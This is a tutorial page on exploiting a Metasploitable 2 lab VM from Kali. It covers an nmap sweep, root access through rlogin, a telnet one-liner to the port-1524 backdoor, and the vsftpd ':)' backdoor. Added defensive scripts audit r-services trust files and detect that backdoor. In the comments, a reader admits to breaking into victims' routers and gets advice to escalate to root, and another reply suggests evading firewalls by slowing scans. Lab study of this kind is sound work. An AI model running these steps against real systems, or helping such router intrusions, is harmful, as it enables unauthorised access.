Portscan
On a Kali Linux machine, open a terminal. Type ifconfig and note the eth0 IP address. This gives you an idea of what the IP of your target machine could be. In my case, ifconfig returned my IPv4 address as 192.168.154.131. This means that Metasploitable must have an IP somewhere in the 192.168.154.xxx range. To scan the hosts in that range, you can use an Nmap scan. Here is what it should look like.
nmap -sS 192.168.154.0/24
The conclusion that can be drawn here is that the Metasploitable 2 machine has IP 192.168.154.132. It also has a large number of open ports. As you will discover later, each of these ports is a potential gateway into the machine. On the Metasploitable machine, after logging in with msfadmin:msfadmin, you can run ifconfig to verify that the IP is indeed 192.168.154.132 (or whatever it may be in your case).
Vulnerabilities
The Metasploitable 2 operating system has been loaded with a large number of vulnerabilities. Metasploitable 2 contains the following kinds of vulnerabilities:
- Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system.
- Backdoors - A few programs and services have been backdoored. These backdoors can be used to gain access to the OS.
- Weak Passwords - These are vulnerable to bruteforce attacks.
- Vulnerable Web Services - A few web services pre-installed into Metasploitable have known vulnerabilities which can be exploited.
- Web Application Vulnerabilities - Some vulnerable web applications can be exploited to gain entry to the system.
There is a very useful article covering many of these vulnerabilities on the Rapid7 website.
Exploiting The Vulnerabilities
Remote access vulnerability - Rlogin
Remember the list of open ports you came across during the port scan? Ports 512, 513 and 514 are there for remotely accessing Unix machines. They have been misconfigured in such a way that anyone can set up a remote connection without proper authentication. This vulnerability is easy to exploit. We will use rlogin to remotely log in to Metasploitable 2. Type rlogin to see the details about the command structure.
root@kali:~# rlogin
usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec]
[-D [bind_address:]port] [-e escape_char] [-F configfile]
[-I pkcs11] [-i identity_file]
[-L [bind_address:]port:host:hostport]
[-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port]
[-R [bind_address:]port:host:hostport] [-S ctl_path]
[-W host:port] [-w local_tun[:remote_tun]]
[user@]hostname [command]
rlogin -l root 192.168.154.132
Most probably you will get something like this:
root@kali:~# rlogin -l root 192.168.154.132
The authenticity of host '192.168.154.132 (192.168.154.132)' can't be established.
RSA key fingerprint is *****.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.154.132' (RSA) to the list of known hosts.
root@192.168.154.132's password:
As you can see, it is asking for a password. That is not because the target is not vulnerable. It is because we don't have rsh-client installed on Kali Linux, so the rlogin command is being handled by ssh (note the ssh usage text above). rsh-client is a remote login utility that allows users to connect to remote machines.
apt-get install rsh-client
This will start the installation process. You'll have to type yes once or twice, and Kali will do the rest for you. After the installation is successful, try your previous command again. This time around, things will be better.
root@kali:~# rlogin -l root 192.168.154.132
Last login: Thu May 1 11:34:55 EDT 2014 from :0.0 on pts/0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~#
Now you have an administrator-privilege shell on Metasploitable 2. That was as easy as typing one line (and installing an application). There is one more such vulnerability that can be exploited easily.
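The host-side view of this misconfiguration, as an added example that is not part of the original tutorial: the r-services take their trust decisions from /etc/hosts.equiv and per-user .rhosts files, and a bare + in the host or user field matches everyone. The script below lists such entries; that Metasploitable's exposure comes from these files is an assumption the page does not state, and the function names, directory layout and sample files are constructed.

```shell
#!/bin/sh
# Added example: list wildcard trust entries in r-services trust files.
# Entry format is "host [user]"; a bare "+" in either field matches
# every host or every user.

# list_wildcard_trust FILE -> "FILE:LINE: entry" for each wildcard entry
list_wildcard_trust() {
    [ -r "$1" ] || return 0
    awk -v f="$1" '
        { sub(/#.*/, "") }                    # ignore comments
        NF == 0 { next }                      # ignore blank lines
        # "+@group" is a netgroup reference, not a wildcard, so only an
        # exact "+" counts.
        $1 == "+" || $2 == "+" { printf "%s:%d: %s\n", f, NR, $0 }
    ' "$1"
}

# audit_rtrust [ROOT] -> scan the system-wide file and every per-user file
# under ROOT (default: the live filesystem).
audit_rtrust() {
    root=${1:-}
    for f in "$root/etc/hosts.equiv" "$root/root/.rhosts" \
             "$root"/home/*/.rhosts; do
        list_wildcard_trust "$f"
    done
}

# Constructed sample tree (hypothetical hosts and users) for a dry run.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/etc" "$d/root" "$d/home/alice"
    printf '%s\n' '# trusted admin host' 'adminbox.example ops' \
        > "$d/etc/hosts.equiv"
    printf '%s\n' '+ +' > "$d/root/.rhosts"
    printf '%s\n' 'buildhost.example +' '+@labhosts alice' \
        > "$d/home/alice/.rhosts"
    echo "$d"
}

tree=$(make_sample_tree)
audit_rtrust "$tree"      # flags root/.rhosts:1 and home/alice/.rhosts:1
rm -rf "$tree"
```

Run with no argument on a real host, it audits the live files; any line it prints is an entry to remove, and a host that does not need rlogin or rsh is better served by disabling those services altogether.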
Telnet Vulnerability
Look at the open port list again. On port 21, Metasploitable 2 runs VSFTPD, a popular FTP server. The version that is installed on Metasploitable contains a backdoor. The backdoor was quickly identified and removed, but not before quite a few people downloaded it. If a username is sent that ends in the sequence ":)" (the happy smiley), the backdoored version will open a listening shell on port 6200. This means anyone can log in to the computer without knowing the credentials, just by using :). This can be exploited using Metasploit. We will cover this in the next tutorial. Till then, something for your appetite:
telnet 192.168.99.131 1524
This is another one-line exploit, on the 1524 ingreslock port (see the portscan result). I will post more stuff soon, but this is all for now.
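The detection side of the vsftpd backdoor described in this section, as an added example that is not part of the original post: it flags FTP USER commands whose username contains ":)" and checks for a listener on port 6200. The log layout, the function names and all sample lines are constructed assumptions.

```shell
#!/bin/sh
# Added example: two host-side indicators of the vsftpd backdoor.
# The log layout and every sample value below are constructed.

# smiley_logins [FILE...] -> "client<TAB>username" for each FTP USER
# command whose username contains ":)" (this includes names ending in it).
smiley_logins() {
    awk -F'"' '
        /FTP command:/ && $4 ~ /^USER / && index($4, ":)") > 0 {
            print $2 "\t" substr($4, 6)       # field 2 = client, 4 = command
        }' "$@"
}

# listeners_on PORT... -> reads `ss -ltn` output on stdin and prints the
# local address of each LISTEN socket bound to one of the given ports.
listeners_on() {
    awk -v want=" $* " '
        $1 == "LISTEN" {
            port = $4
            sub(/.*:/, "", port)              # keep text after the last colon
            if (index(want, " " port " ") > 0) print $4
        }'
}

sample_ftp_log() {                            # constructed log lines
    cat <<'EOF'
Thu May  1 11:20:01 2014 [pid 4101] FTP command: Client "192.168.154.131", "USER anonymous"
Thu May  1 11:20:02 2014 [pid 4101] FTP command: Client "192.168.154.131", "PASS <password>"
Thu May  1 11:21:17 2014 [pid 4107] FTP command: Client "192.168.154.140", "USER backup:)"
Thu May  1 11:21:17 2014 [pid 4107] FTP response: Client "192.168.154.140", "331 Please specify the password."
EOF
}

sample_ss() {                                 # constructed `ss -ltn` output
    cat <<'EOF'
State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      32     0.0.0.0:21         0.0.0.0:*
LISTEN 0      1      0.0.0.0:6200       0.0.0.0:*
LISTEN 0      128    [::]:22            [::]:*
EOF
}

sample_ftp_log | smiley_logins                # 192.168.154.140  backup:)
sample_ss | listeners_on 6200                 # 0.0.0.0:6200
```

The same listener check covers the other ports this page names: piping `ss -ltn` into `listeners_on 512 513 514 1524 6200` shows whether any of them is still exposed on a host.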
Hi, found something to add.
Users need to set their VM internet connection as "VM" to scan ports. Otherwise the ifconfig will not provide correct IP.
Please elaborate. I didn't get you. Are you talking about the port-scan step?
Hope it works.
Hi, I have hacked some routers (TP_Link and D_Link)... so I have full, complete access
to the victim's router web interface... (my OS = Kali)... is there any way to sniff PC data traffic behind NAT? (except DNS spoofing)
Web interface is nice but yields little. You need to gain root access if you want to get anywhere.
Nice job. Thank you
Where can I find the rest of your tutorials on this?
hii
first amazing site love it
and second I can't find any ports.
my laptop runs Kali and my PC runs VM Metasploitable2
I use nmap and get this >>>>
note : host seems down , if it is really up , but blocking our ping probes , try -Pn (I tried it, not working either)
nmap done : 1 IP Address ( 0 host up ) .
What do I need to do?
thanks.
You must ensure your Metasploitable is up and running when scanning.
Your Metasploitable2 must be up and running when you are testing.
Scanning with nmap shows all ports are filtered. What should I do?
Turn off the firewall, or slow down the scan so the firewall doesn't detect it. Also experiment with scan types.
Hi,
I followed up to the step where you download the RSH client. I am using a Kali VM and Metasploitable VM at the same time. For some reason when I try to remote login to Metasploitable now I get rlogind: Permission denied. Can you possibly help me out with this? I have been stuck for two days!
hi
I am using Windows 10 and I have installed Metasploitable in VirtualBox. So how will I use Metasploit in Metasploitable?
Follow this guide to set up your pentest lab: https://www.hackingloops.com/kali-linux-virtualbox-pentest-lab/